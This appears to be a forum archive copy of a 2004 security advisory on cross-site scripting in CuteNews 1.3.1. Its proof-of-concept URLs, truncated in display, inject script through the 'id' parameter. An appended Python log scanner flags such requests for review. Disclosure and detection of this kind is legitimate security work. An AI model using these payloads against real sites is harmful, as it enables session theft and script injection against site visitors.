Full Version: Cross-site Scripting Cutenews
GovernmentSecurity.org > The Archives > Exploit Articles
qcred11
Jun 28 2004, 05:51 PM
QUOTE


PROGRAM: CuteNews
  HOMEPAGE: http://cutephp.com/
  VERSION: v1.3.1
  BUG: Cross-Site Scripting
  DATE: 23/05/2004
  AUTHOR: DarkBicho
         
-----------------------------------------------------------------------------------------------


1.- Affected software description:
    -----------------------------


    CuteNews is a popular news publishing program, written in PHP by
    CutePHP.


2.- Vulnerabilities:
    ---------------


    A. Cross-Site Scripting aka XSS:


    :.: In Id :
http://attacker/show_archives.php?subactio...rt_from=&ucat=&


http://attacker/show_news.php?subaction=sh...rt_from=&ucat=&


http://attacker/example1.php?subaction=sho...</script>


http://attacker/example2.php?subaction=sho...</script>

   
   
3.- SOLUTION:
    --------
    Vendors were contacted many weeks ago and plan to release a fixed
    version soon.
    Check the CuteNews website for updates and official release details.

4.- Greetings:
    ---------

    greetings to my Peruvian group swp and perunderforce :D
    "EL PISCO ES Y SERA PERUANO"


5.- Contact
    -------


        WEB: http://www.darkbicho.tk
        EMAIL: darkbicho_at_peru.com




Source: http://seclists.org/lists/bugtraq/2004/Jun/0438.html
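
As an added example (not part of the advisory and not CuteNews code), the following Python scans web-server access-log lines for requests to the script names listed in the advisory whose query parameters decode to HTML markup characters, so an administrator can review them while waiting for the vendor fix. The combined log format, the addresses and every parameter value in the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script names listed in the advisory.
CUTENEWS_SCRIPTS = {"show_archives.php", "show_news.php", "example1.php", "example2.php"}
MARKUP = re.compile(r"[<>\"']")  # characters that must be HTML-encoded on output
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')  # assumes combined log format

def decode_fully(value, rounds=3):
    """Undo up to `rounds` extra layers of percent-encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(log_line):
    """Names of query parameters that decode to markup, for CuteNews scripts only."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if url.path.rsplit("/", 1)[-1].lower() not in CUTENEWS_SCRIPTS:
        return []
    return sorted({name for name, value in parse_qsl(url.query, keep_blank_values=True)
                   if MARKUP.search(decode_fully(value))})

def flag_lines(lines):
    """Return (line_number, parameter_names) for every line worth reviewing."""
    hits = [(n, suspicious_params(line)) for n, line in enumerate(lines, 1)]
    return [(n, params) for n, params in hits if params]

# Constructed sample log lines (documentation addresses, harmless <i> marker).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Jun/2004:17:51:02 +0000] "GET /news/show_news.php?subaction=x&id=1085300000&start_from=&ucat= HTTP/1.1" 200 5120',
    '192.0.2.11 - - [28/Jun/2004:17:52:10 +0000] "GET /news/show_archives.php?subaction=x&id=%3Ci%3Etest%3C%2Fi%3E&ucat= HTTP/1.1" 200 4810',
    '192.0.2.12 - - [28/Jun/2004:17:53:44 +0000] "GET /news/example1.php?subaction=x&id=%253Ci%253Etest HTTP/1.1" 200 4790',
    '192.0.2.13 - - [28/Jun/2004:17:54:01 +0000] "GET /index.php?q=%3Ci%3Etest HTTP/1.1" 200 1200',
]

if __name__ == "__main__":
    for n, params in flag_lines(SAMPLE_LOG):
        print(f"line {n}: markup in parameter(s) {', '.join(params)}")
```

The third sample line is double percent-encoded, which is why values are decoded repeatedly before matching.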